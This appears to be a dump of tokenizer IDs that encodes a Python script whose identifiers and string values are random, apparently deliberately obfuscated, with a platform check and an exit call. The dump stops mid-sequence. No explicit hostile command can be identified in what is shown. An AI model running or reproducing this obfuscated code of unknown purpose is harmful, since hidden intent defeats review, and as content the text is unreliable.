44817,
48,
2025,
3978,
37,
15199,
79,
3727,
81,
39,
76,
19238,
88,
86,
80,
36820,
2149,
55,
87,
23621,
80,
39,
14114,
198,
220,
220,
220,
3601,
7,
38,
7112,
79,
85,
39,
86,
41,
76,
30832,
55,
85,
42,
1797,
89,
9693,
87,
2640,
43395,
27912,
365,
4507,
37,
87,
30386,
76,
41,
89,
35028,
51,
2943,
38,
48382,
56,
7902,
88,
3225,
80,
87,
32,
68,
13940,
42598,
40939,
49,
8,
198,
220,
220,
220,
25064,
13,
37023,
7,
15,
8,
198,
77,
18504,
41,
5258,
30386,
14981,
4462,
48,
37,
34223,
53,
16811,
12161,
29499,
74,
17931,
68,
15200,
69,
80,
12161,
39,
41,
1273,
14529,
10008,
41133,
38,
66,
7902,
85,
40464,
37,
21713,
33,
7730,
4825,
83,
40,
5431,
41,
796,
25064,
13,
24254,
198,
48,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
796,
705,
14313,
24160,
84,
36,
4760,
79,
23155,
36,
74,
1652,
84,
35028,
12096,
22328,
86,
19684,
89,
86,
21217,
49345,
48,
23155,
44802,
73,
48,
45766,
9139,
47,
85,
36,
86,
7399,
76,
89,
47,
3483,
78,
36287,
86,
20866,
87,
35,
77,
35,
6,
198,
41,
37,
69,
36,
89,
86,
1546,
76,
1383,
27159,
4760,
87,
47347,
35,
25093,
39,
41,
85,
50,
15112,
74,
48,
53,
83,
41,
36,
89,
32886,
89,
44817,
14795,
80,
33018,
20519,
7156,
1544,
46,
23852,
80,
2514,
32178,
80,
43,
87,
48,
35,
796,
705,
45113,
71,
11012,
32178,
34,
732,
14529,
824,
55,
3697,
85,
32,
84,
1546,
5188,
28391,
46987,
71,
74,
35,
24142,
46141,
55,
6998,
54,
41,
80,
77,
38,
85,
13752,
4792,
31273,
51,
10761,
71,
46,
10008,
84,
38,
87,
3705,
84,
6,
198,
34,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
796,
705,
40,
7670,
36,
6242,
40464,
49,
86,
4061,
43,
4339,
80,
34,
421,
2749,
39,
77,
39,
28747,
9865,
67,
35755,
76,
23820,
8610,
24544,
79,
47,
7708,
87,
32,
48,
2528,
40832,
72,
51,
30300,
48,
1137,
75,
47,
83,
5222,
89,
6,
198,
1921,
35,
86,
49,
89,
50,
55,
53,
39,
726,
46,
88,
48,
37,
76,
5188,
68,
32,
1921,
5760,
1837,
49,
17511,
69,
34,
4561,
50,
5222,
38202,
41,
12861,
49345,
70,
86,
14255,
85,
44011,
77,
42,
5653,
48,
36802,
77,
4503,
796,
705,
86,
44802,
39,
818,
7414,
77,
87,
38,
87,
55,
40,
71,
38,
57,
11401,
41,
13940,
11401,
50123,
5211,
45,
79,
53,
89,
1565,
82,
11901,
88,
8642,
85,
44802,
32886,
16630,
41,
3539,
22764,
11012,
47,
57,
17511,
21062,
80,
25374,
6,
198,
87,
25492,
56,
20259,
43421,
28047,
2200,
74,
3698,
73,
48,
7357,
48,
49,
87,
41,
83,
46,
41,
48,
39,
5574,
48,
89,
34,
42592,
34,
3528,
77,
48,
87,
48,
71,
69,
37,
88,
38022,
6187,
52,
70,
4720,
39,
86,
25189,
89,
44816,
47858,
796,
705,
9139,
33,
85,
1921,
82,
38,
3351,
16412,
48,
260,
39,
75,
43421,
37,
48,
41,
75,
16458,
76,
80,
35,
33884,
41,
5574,
39,
18504,
41697,
48,
70,
55,
50,
42528,
48,
20802,
16960,
6535,
45,
20474,
21749,
4948,
28900,
20418,
6,
198,
87,
49,
81,
39,
45,
75,
2885,
4177,
86,
5431,
6500,
39,
15916,
1273,
70,
818,
78,
41,
85,
16045,
86,
10526,
5258,
4261,
87,
74,
56,
3886,
85,
40,
2149,
23577,
77,
41,
54,
10080,
80,
49,
33863,
85,
49,
27305,
31166,
47,
54,
796,
705,
85,
89,
45,
87,
904,
80,
52,
305,
33,
74,
38,
20304,
7397,
929,
452,
41541,
37,
34223,
33,
89,
80,
50,
70,
12562,
14259,
81,
80,
38,
22556,
38,
6187,
38,
1921,
48,
7340,
72,
41,
16045,
87,
2601,
23852,
48,
80,
49,
6,
198,
361,
1195,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
14512,
38661,
86,
49,
89,
50,
55,
53,
39,
726,
46,
88,
48,
37,
76,
5188,
68,
32,
1921,
5760,
1837,
49,
17511,
69,
34,
4561,
50,
5222,
38202,
41,
12861,
49345,
70,
86,
14255,
85,
44011,
77,
42,
5653,
48,
36802,
77,
4503,
25,
198,
220,
220,
220,
449,
37,
69,
36,
89,
86,
1546,
76,
1383,
27159,
4760,
87,
47347,
35,
25093,
39,
41,
85,
50,
15112,
74,
48,
53,
83,
41,
36,
89,
32886,
89,
44817,
14795,
80,
33018,
20519,
7156,
1544,
46,
23852,
80,
2514,
32178,
80,
43,
87,
48,
35,
796,
327,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
198,
220,
220,
220,
329,
2124,
49,
81,
39,
45,
75,
2885,
4177,
86,
5431,
6500,
39,
15916,
1273,
70,
818,
78,
41,
85,
16045,
86,
10526,
5258,
4261,
87,
74,
56,
3886,
85,
40,
2149,
23577,
77,
41,
54,
10080,
80,
49,
33863,
85,
49,
27305,
31166,
47,
54,
287,
38661,
86,
49,
89,
50,
55,
53,
39,
726,
46,
88,
48,
37,
76,
5188,
68,
32,
1921,
5760,
1837,
49,
17511,
69,
34,
4561,
50,
5222,
38202,
41,
12861,
49345,
70,
86,
14255,
85,
44011,
77,
42,
5653,
48,
36802,
77,
4503,
25,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2124,
49,
81,
39,
45,
75,
2885,
4177,
86,
5431,
6500,
39,
15916,
1273,
70,
818,
78,
41,
85,
16045,
86,
10526,
5258,
4261,
87,
74,
56,
3886,
85,
40,
2149,
23577,
77,
41,
54,
10080,
80,
49,
33863,
85,
49,
27305,
31166,
47,
54,
14512,
327,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
449,
37,
69,
36,
89,
86,
1546,
76,
1383,
27159,
4760,
87,
47347,
35,
25093,
39,
41,
85,
50,
15112,
74,
48,
53,
83,
41,
36,
89,
32886,
89,
44817,
14795,
80,
33018,
20519,
7156,
1544,
46,
23852,
80,
2514,
32178,
80,
43,
87,
48,
35,
796,
449,
37,
69,
36,
89,
86,
1546,
76,
1383,
27159,
4760,
87,
47347,
35,
25093,
39,
41,
85,
50,
15112,
74,
48,
53,
83,
41,
36,
89,
32886,
89,
44817,
14795,
80,
33018,
20519,
7156,
1544,
46,
23852,
80,
2514,
32178,
80,
43,
87,
48,
35,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2124,
25492,
56,
20259,
43421,
28047,
2200,
74,
3698,
73,
48,
7357,
48,
49,
87,
41,
83,
46,
41,
48,
39,
5574,
48,
89,
34,
42592,
34,
3528,
77,
48,
87,
48,
71,
69,
37,
88,
38022,
6187,
52,
70,
4720,
39,
86,
25189,
89,
44816,
47858,
796,
1195,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
198,
17772,
25,
198,
220,
220,
220,
327,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
796,
1195,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
198,
220,
220,
220,
1195,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
796,
2124,
25492,
56,
20259,
43421,
28047,
2200,
74,
3698,
73,
48,
7357,
48,
49,
87,
41,
83,
46,
41,
48,
39,
5574,
48,
89,
34,
42592,
34,
3528,
77,
48,
87,
48,
71,
69,
37,
88,
38022,
6187,
52,
70,
4720,
39,
86,
25189,
89,
44816,
47858,
198,
220,
220,
220,
611,
327,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
6624,
1195,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
2124,
49,
81,
39,
45,
75,
2885,
4177,
86,
5431,
6500,
39,
15916,
1273,
70,
818,
78,
41,
85,
16045,
86,
10526,
5258,
4261,
87,
74,
56,
3886,
85,
40,
2149,
23577,
77,
41,
54,
10080,
80,
49,
33863,
85,
49,
27305,
31166,
47,
54,
287,
1195,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
2124,
49,
81,
39,
45,
75,
2885,
4177,
86,
5431,
6500,
39,
15916,
1273,
70,
818,
78,
41,
85,
16045,
86,
10526,
5258,
4261,
87,
74,
56,
3886,
85,
40,
2149,
23577,
77,
41,
54,
10080,
80,
49,
33863,
85,
49,
27305,
31166,
47,
54,
6624,
327,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
796,
1195,
10761,
48,
49,
86,
280,
4720,
1031,
10008,
80,
23155,
17511,
7156,
39,
86,
89,
37,
89,
3109,
23852,
3727,
38,
83,
38,
79,
707,
54,
89,
76,
49,
21217,
7156,
36,
41,
72,
49,
74,
89,
32,
48,
34,
87,
34,
74,
38,
5324,
18227,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
327,
22117,
85,
4561,
38,
87,
2149,
84,
47,
43812,
5222,
74,
45,
75,
55,
79,
18429,
3861,
48,
31212,
27799,
16692,
81,
41,
38,
89,
37,
74,
3546,
45,
19266,
34586,
15112,
86,
34,
15543,
41,
89,
85,
89,
81,
10008,
72,
34,
76,
38,
796,
2124,
25492,
56,
20259,
43421,
28047,
2200,
74,
3698,
73,
48,
7357,
48,
49,
87,
41,
83,
46,
41,
48,
39,
5574,
48,
89,
34,
42592,
34,
3528,
77,
48,
87,
48,
71,
69,
37,
88,
38022,
6187,
52,
70,
4720,
39,
86,
25189,
89,
44816,
47858,
198,
25690,
80,
36,
48,
8697,
88,
388,
3185,
3109,
39,
2821,
49,
7998,
4579,
37,
7399,
49,
12096,
48,
73,
36,
5760,
13916,
30501,
4246,
85,
38,
11401,
15112,
89,
9078,
8763,
57,
2577,
88,
44179,
89,
4805,
9273,
16045,
220,
220,
220,
220,
220,
796,
705,
36750,
6,
198,
49,
86,
51,
3629,
32,
48,
41,
343,
20471,
84,
4462,
87,
32,
2238,
54,
7708,
42413,
41,
80,
3978,
3705,
57,
4537,
88,
3483,
41,
21062,
33,
48,
20185,
81,
56,
22296,
5247,
33,
48,
50,
70,
35,
80,
7112,
22556,
21841,
11190,
796,
705,
27481,
77,
80,
88,
6242,
39,
73,
2127,
47,
76,
40,
21217,
41,
2047,
48,
37,
48,
36,
3109,
3528,
44,
86,
85,
49,
73,
81,
33,
12473,
83,
49,
75,
39,
41582,
10234,
78,
3539,
88,
2969,
1797,
10277,
13807,
41,
39,
26001,
85,
77,
57,
6,
198,
84,
35,
56,
41,
3629,
78,
43833,
5064,
81,
36,
80,
5431,
38,
77,
33,
85,
40,
87,
10761,
33,
89,
34,
87,
25374,
89,
41074,
57,
73,
273,
49,
7112,
88,
34,
41,
9139,
33,
77,
32178,
82,
6322,
43,
37,
87,
73,
85,
5432,
41,
1268,
55,
796,
705,
71,
35,
1820,
48,
41,
22184,
69,
6489,
48,
21370,
42598,
81,
33,
86,
41,
39,
77,
33,
48,
30630,
48,
86,
49,
81,
48,
35,
56,
32178,
37,
6500,
72,
4339,
87,
81,
5258,
24544,
76,
33,
7836,
86,
73,
85,
35,
7708,
89,
301,
40,
89,
37,
6,
198,
71,
74,
32754,
31166,
89,
8457,
48,
46,
84,
37,
78,
80,
7156,
2246,
33,
71,
4663,
76,
45,
448,
55,
13916,
4246,
47,
86,
1797,
32754,
306,
39,
35238,
48,
87,
34,
80,
5189,
32,
41,
39,
75,
36,
78,
10082,
37,
41,
15112,
796,
705,
41,
48,
83,
3705,
8205,
56,
2164,
87,
80,
45766,
7730,
87,
34,
11190,
66,
4851,
81,
37,
70,
37,
4805,
79,
55,
49,
27624,
2437,
39,
11909,
20418,
89,
38,
87,
33,
7998,
3955,
4246,
81,
1961,
33,
2389,
57,
89,
11473,
84,
6,
198,
80,
46,
22556,
84,
41,
83,
41,
30386,
52,
78,
45,
4851,
48,
46,
41,
83,
8697,
70,
10917,
69,
48,
76,
4093,
18878,
80,
81,
28900,
46747,
7355,
86,
17184,
1273,
385,
36,
1069,
41,
12473,
84,
33,
41275,
3955,
82,
21095,
87,
76,
796,
705,
79,
10913,
6836,
87,
3666,
33,
39,
86,
40,
1837,
1069,
274,
44,
26705,
28900,
80,
88,
14082,
54,
261,
37,
79,
50,
3483,
32,
41,
38,
83,
35,
73,
4851,
37,
74,
18429,
1546,
3398,
81,
39,
8205,
40533,
39,
82,
38,
70,
30195,
6,
198,
84,
7639,
45,
10277,
35,
36820,
88,
3705,
33884,
50,
10082,
3539,
33,
39,
87,
40,
2959,
1026,
38989,
7340,
88,
14887,
38,
41,
36,
86,
11901,
8905,
33,
39,
3838,
87,
50,
33704,
35,
38,
41,
7156,
46,
88,
6998,
4663,
21116,
796,
705,
71,
23060,
56,
14082,
77,
50,
1130,
49,
89,
41736,
48,
35,
48,
71,
49,
15112,
56,
48,
73,
32,
41,
4834,
10008,
29499,
34106,
41,
9419,
45,
86,
36,
41,
16501,
41,
21095,
85,
86,
38,
38841,
89,
55,
36484,
2885,
67,
45,
74,
32298,
6,
198,
81,
37,
1533,
37,
9865,
39,
75,
40,
78,
48,
49,
17213,
33884,
46,
7156,
87,
2389,
85,
35,
89,
43021,
17250,
16412,
41,
35972,
76,
8220,
79,
23683,
11230,
32,
48,
48,
3069,
10917,
85,
34,
36820,
89,
28015,
17184,
38,
41,
85,
796,
705,
80,
22495,
89,
74,
30386,
48,
72,
4339,
56,
35028,
76,
37020,
39,
2749,
88,
49,
14050,
87,
75,
35,
732,
87,
41,
4061,
48,
17602,
40464,
9865,
10913,
35,
79,
40,
78,
2736,
48,
46833,
86,
39,
79,
44817,
87,
41,
40,
39,
76,
39,
6,
198,
361,
289,
74,
32754,
31166,
89,
8457,
48,
46,
84,
37,
78,
80,
7156,
2246,
33,
71,
4663,
76,
45,
448,
55,
13916,
4246,
47,
86,
1797,
32754,
306,
39,
35238,
48,
87,
34,
80,
5189,
32,
41,
39,
75,
36,
78,
10082,
37,
41,
15112,
6624,
10662,
46,
22556,
84,
41,
83,
41,
30386,
52,
78,
45,
4851,
48,
46,
41,
83,
8697,
70,
10917,
69,
48,
76,
4093,
18878,
80,
81,
28900,
46747,
7355,
86,
17184,
1273,
385,
36,
1069,
41,
12473,
84,
33,
41275,
3955,
82,
21095,
87,
76,
25,
198,
220,
220,
220,
329,
374,
37,
1533,
37,
9865,
39,
75,
40,
78,
48,
49,
17213,
33884,
46,
7156,
87,
2389,
85,
35,
89,
43021,
17250,
16412,
41,
35972,
76,
8220,
79,
23683,
11230,
32,
48,
48,
3069,
10917,
85,
34,
36820,
89,
28015,
17184,
38,
41,
85,
287,
334,
7639,
45,
10277,
35,
36820,
88,
3705,
33884,
50,
10082,
3539,
33,
39,
87,
40,
2959,
1026,
38989,
7340,
88,
14887,
38,
41,
36,
86,
11901,
8905,
33,
39,
3838,
87,
50,
33704,
35,
38,
41,
7156,
46,
88,
6998,
4663,
21116,
25,
198,
220,
220,
220,
220,
220,
220,
220,
611,
374,
37,
1533,
37,
9865,
39,
75,
40,
78,
48,
49,
17213,
33884,
46,
7156,
87,
2389,
85,
35,
89,
43021,
17250,
16412,
41,
35972,
76,
8220,
79,
23683,
11230,
32,
48,
48,
3069,
10917,
85,
34,
36820,
89,
28015,
17184,
38,
41,
85,
6624,
10662,
46,
22556,
84,
41,
83,
41,
30386,
52,
78,
45,
4851,
48,
46,
41,
83,
8697,
70,
10917,
69,
48,
76,
4093,
18878,
80,
81,
28900,
46747,
7355,
86,
17184,
1273,
385,
36,
1069,
41,
12473,
84,
33,
41275,
3955,
82,
21095,
87,
76,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
334,
7639,
45,
10277,
35,
36820,
88,
3705,
33884,
50,
10082,
3539,
33,
39,
87,
40,
2959,
1026,
38989,
7340,
88,
14887,
38,
41,
36,
86,
11901,
8905,
33,
39,
3838,
87,
50,
33704,
35,
38,
41,
7156,
46,
88,
6998,
4663,
21116,
796,
31641,
51,
3629,
32,
48,
41,
343,
20471,
84,
4462,
87,
32,
2238,
54,
7708,
42413,
41,
80,
3978,
3705,
57,
4537,
88,
3483,
41,
21062,
33,
48,
20185,
81,
56,
22296,
5247,
33,
48,
50,
70,
35,
80,
7112,
22556,
21841,
11190,
198,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
10662,
46,
22556,
84,
41,
83,
41,
30386,
52,
78,
45,
4851,
48,
46,
41,
83,
8697,
70,
10917,
69,
48,
76,
4093,
18878,
80,
81,
28900,
46747,
7355,
86,
17184,
1273,
385,
36,
1069,
41,
12473,
84,
33,
41275,
3955,
82,
21095,
87,
76,
796,
334,
35,
56,
41,
3629,
78,
43833,
5064,
81,
36,
80,
5431,
38,
77,
33,
85,
40,
87,
10761,
33,
89,
34,
87,
25374,
89,
41074,
57,
73,
273,
49,
7112,
88,
34,
41,
9139,
33,
77,
32178,
82,
6322,
43,
37,
87,
73,
85,
5432,
41,
1268,
55,
198,
22184,
48,
46,
5064,
47,
660,
41,
1820,
37,
85,
71,
48,
4579,
36,
11015,
39,
4339,
21768,
57,
20418,
33,
86,
2749,
36,
86,
40,
37020,
24142,
39,
1134,
85,
41,
86,
28869,
69,
10234,
35,
2200,
1383,
4339,
7156,
41,
220,
220,
220,
220,
220,
796,
1511,
2718,
198,
34,
4792,
10161,
10008,
88,
1026,
77,
15922,
2025,
36,
89,
40,
68,
44,
25093,
49,
41,
40291,
8264,
86,
2484,
35990,
20760,
39,
33704,
40533,
10426,
33,
87,
47858,
87,
39,
38,
2389,
4720,
84,
49,
86,
38,
70,
42,
7278,
41,
51,
796,
705,
36,
41,
20418,
83,
51,
42,
4579,
11571,
65,
7708,
41,
8763,
49,
8903,
48,
21095,
49,
15199,
41,
2959,
41,
38,
89,
16501,
21095,
33,
89,
8068,
4792,
7801,
86,
35,
5188,
3109,
87,
4579,
39,
55,
88,
48,
36,
29567,
45579,
86,
6,
198,
82,
28900,
37,
32178,
38,
87,
84,
4663,
2640,
2200,
13599,
78,
5247,
41,
54,
53,
47920,
15916,
12889,
86,
53,
84,
86,
4579,
818,
88,
80,
1722,
11674,
86,
37,
87,
89,
48,
75,
24723,
82,
26009,
8575,
88,
37,
4303,
1026,
796,
705,
9399,
4462,
6500,
41,
43,
87,
47,
84,
41,
4561,
1268,
79,
38,
7998,
80,
41133,
48192,
42955,
37,
36905,
9374,
41,
55,
35,
77,
38,
85,
26708,
10761,
4948,
11571,
4760,
16768,
48,
48,
16630,
39,
82,
43894,
5247,
89,
67,
6,
198,
1137,
15418,
87,
6968,
86,
48,
54,
76,
52,
3629,
48,
50,
34523,
80,
48,
774,
47,
14795,
33666,
87,
361,
86,
35,
2213,
33,
87,
5258,
73,
41,
80,
45,
77,
87,
2246,
50,
55,
27385,
37,
77,
3792,
41,
55,
85,
32,
46,
41,
9501,
796,
705,
42668,
89,
85,
89,
30832,
56,
39,
8895,
78,
48,
38,
10305,
37000,
47,
80,
38,
2885,
76,
41,
87,
32,
48,
49,
893,
80,
709,
85,
89,
49,
89,
48,
42421,
57,
74,
57,
80,
35313,
49079,
7378,
89,
85,
35,
87,
6500,
88,
15200,
87,
77,
6,
198,
361,
327,
4792,
10161,
10008,
88,
1026,
77,
15922,
2025,
36,
89,
40,
68,
44,
25093,
49,
41,
40291,
8264,
86,
2484,
35990,
20760,
39,
33704,
40533,
10426,
33,
87,
47858,
87,
39,
38,
2389,
4720,
84,
49,
86,
38,
70,
42,
7278,
41,
51,
6624,
264,
28900,
37,
32178,
38,
87,
84,
4663,
2640,
2200,
13599,
78,
5247,
41,
54,
53,
47920,
15916,
12889,
86,
53,
84,
86,
4579,
818,
88,
80,
1722,
11674,
86,
37,
87,
89,
48,
75,
24723,
82,
26009,
8575,
88,
37,
4303,
1026,
25,
198,
220,
220,
220,
13793,
15418,
87,
6968,
86,
48,
54,
76,
52,
3629,
48,
50,
34523,
80,
48,
774,
47,
14795,
33666,
87,
361,
86,
35,
2213,
33,
87,
5258,
73,
41,
80,
45,
77,
87,
2246,
50,
55,
27385,
37,
77,
3792,
41,
55,
85,
32,
46,
41,
9501,
796,
705,
42668,
89,
85,
89,
30832,
56,
39,
8895,
78,
48,
38,
10305,
37000,
47,
80,
38,
2885,
76,
41,
87,
32,
48,
49,
893,
80,
709,
85,
89,
49,
89,
48,
42421,
57,
74,
57,
80,
35313,
49079,
7378,
89,
85,
35,
87,
6500,
88,
15200,
87,
77,
6,
198,
220,
220,
220,
13793,
15418,
87,
6968,
86,
48,
54,
76,
52,
3629,
48,
50,
34523,
80,
48,
774,
47,
14795,
33666,
87,
361,
86,
35,
2213,
33,
87,
5258,
73,
41,
80,
45,
77,
87,
2246,
50,
55,
27385,
37,
77,
3792,
41,
55,
85,
32,
46,
41,
9501,
796,
327,
4792,
10161,
10008,
88,
1026,
77,
15922,
2025,
36,
89,
40,
68,
44,
25093,
49,
41,
40291,
8264,
86,
2484,
35990,
20760,
39,
33704,
40533,
10426,
33,
87,
47858,
87,
39,
38,
2389,
4720,
84,
49,
86,
38,
70,
42,
7278,
41,
51,
198,
17772,
25,
198,
220,
220,
220,
13793,
15418,
87,
6968,
86,
48,
54,
76,
52,
3629,
48,
50,
34523,
80,
48,
774,
47,
14795,
33666,
87,
361,
86,
35,
2213,
33,
87,
5258,
73,
41,
80,
45,
77,
87,
2246,
50,
55,
27385,
37,
77,
3792,
41,
55,
85,
32,
46,
41,
9501,
796,
705,
42668,
89,
85,
89,
30832,
56,
39,
8895,
78,
48,
38,
10305,
37000,
47,
80,
38,
2885,
76,
41,
87,
32,
48,
49,
893,
80,
709,
85,
89,
49,
89,
48,
42421,
57,
74,
57,
80,
35313,
49079,
7378,
89,
85,
35,
87,
6500,
88,
15200,
87,
77,
6,
198,
220,
220,
220,
13793,
15418,
87,
6968,
86,
48,
54,
76,
52,
3629,
48,
50,
34523,
80,
48,
774,
47,
14795,
33666,
87,
361,
86,
35,
2213,
33,
87,
5258,
73,
41,
80,
45,
77,
87,
2246,
50,
55,
27385,
37,
77,
3792,
41,
55,
85,
32,
46,
41,
9501,
796,
705,
36,
41,
20418,
83,
51,
42,
4579,
11571,
65,
7708,
41,
8763,
49,
8903,
48,
21095,
49,
15199,
41,
2959,
41,
38,
89,
16501,
21095,
33,
89,
8068,
4792,
7801,
86,
35,
5188,
3109,
87,
4579,
39,
55,
88,
48,
36,
29567,
45579,
86,
6,
198,
34,
10913,
38,
48,
34,
5662,
89,
4261,
23060,
39,
52,
70,
39,
75,
25425,
82,
4462,
77,
37,
48382,
18564,
41,
37,
41,
5097,
14795,
32,
45961,
4535,
24928,
37,
11627,
80,
17947,
3838,
84,
2389,
49,
8264,
48,
12016,
73,
220,
220,
220,
796,
705,
65,
1415,
344,
3865,
13331,
19,
66,
2091,
330,
21033,
2718,
6469,
67,
1507,
2682,
1507,
3388,
69,
6,
198,
28311,
25,
198,
220,
220,
220,
331,
76,
53,
25492,
45,
27481,
85,
86,
10295,
38475,
89,
385,
34,
21713,
86,
1137,
17931,
75,
16960,
37,
48,
29817,
67,
85,
38202,
56,
29138,
32178,
48,
46,
78,
17931,
3546,
429,
38,
3398,
11401,
6780,
49,
862,
56,
86,
796,
705,
66,
3535,
86,
48,
37,
77,
38,
70,
33,
3861,
48,
76,
47772,
48,
37,
88,
43,
45,
80,
66,
56,
3978,
39386,
57,
19881,
31212,
85,
46,
78,
47,
74,
11012,
49,
76,
1581,
82,
38,
6173,
38,
86,
16768,
3698,
89,
54,
2767,
22556,
87,
38,
6,
198,
220,
220,
220,
327,
6732,
87,
23199,
73,
39,
87,
50,
85,
21713,
2821,
38729,
18429,
9527,
3109,
5064,
47,
41,
4851,
7156,
89,
41,
39,
5796,
36,
1404,
7357,
283,
5258,
40,
66,
57,
15571,
11909,
76,
49,
85,
11901,
88,
46,
84,
15916,
38,
796,
705,
5222,
75,
1137,
9078,
37,
4303,
6413,
48192,
38584,
34,
73,
1273,
41,
70,
48,
48,
48,
83,
20895,
5662,
73,
4093,
50,
5246,
38,
76,
73,
37,
48,
57,
38475,
2149,
53,
79,
33,
41,
8898,
16045,
80,
88,
46,
1961,
8220,
48,
36,
6,
198,
220,
220,
220,
1195,
44,
13024,
35,
38,
824,
32,
6500,
56,
77,
47,
89,
83,
4426,
7156,
41,
16811,
72,
31554,
9078,
21800,
660,
48,
56,
15766,
48,
14529,
86,
39,
57,
77,
80,
48587,
4106,
38,
11401,
79,
41,
7399,
41275,
49,
897,
51,
796,
705,
21713,
41,
56,
5760,
4303,
22707,
87,
19499,
2238,
33018,
36,
86,
25093,
39,
482,
35,
85,
35,
45119,
32754,
14542,
41,
38,
47858,
1820,
41,
74,
47,
44817,
10913,
3528,
9419,
70,
742,
17511,
33,
71,
33866,
89,
44958,
6,
198,
220,
220,
220,
266,
86,
38,
404,
17931,
78,
44817,
3886,
53,
3620,
72,
33,
41,
14082,
85,
77,
74,
18429,
78,
32754,
7801,
57,
313,
4503,
36,
21373,
47858,
818,
87,
24723,
1503,
34382,
10080,
55,
2949,
39,
75,
39,
81,
73,
49,
774,
74,
796,
705,
47858,
45607,
86,
41,
89,
7707,
48382,
36,
38202,
32,
80,
538,
41,
18878,
87,
41473,
57,
82,
5760,
4805,
79,
42528,
37,
10227,
33,
77,
32886,
21370,
89,
41,
4805,
39,
20304,
37048,
13909,
89,
31166,
12889,
48,
39,
40291,
87,
6,
198,
220,
220,
220,
1195,
660,
85,
45,
70,
50,
48,
16045,
41,
2943,
10161,
38,
14761,
20402,
32,
41,
89,
22125,
2724,
49,
13038,
80,
20802,
34049,
38,
14259,
89,
55,
1026,
6998,
87,
22764,
77,
37,
7501,
29567,
2389,
72,
4579,
39,
41,
45,
2417,
796,
705,
32,
48,
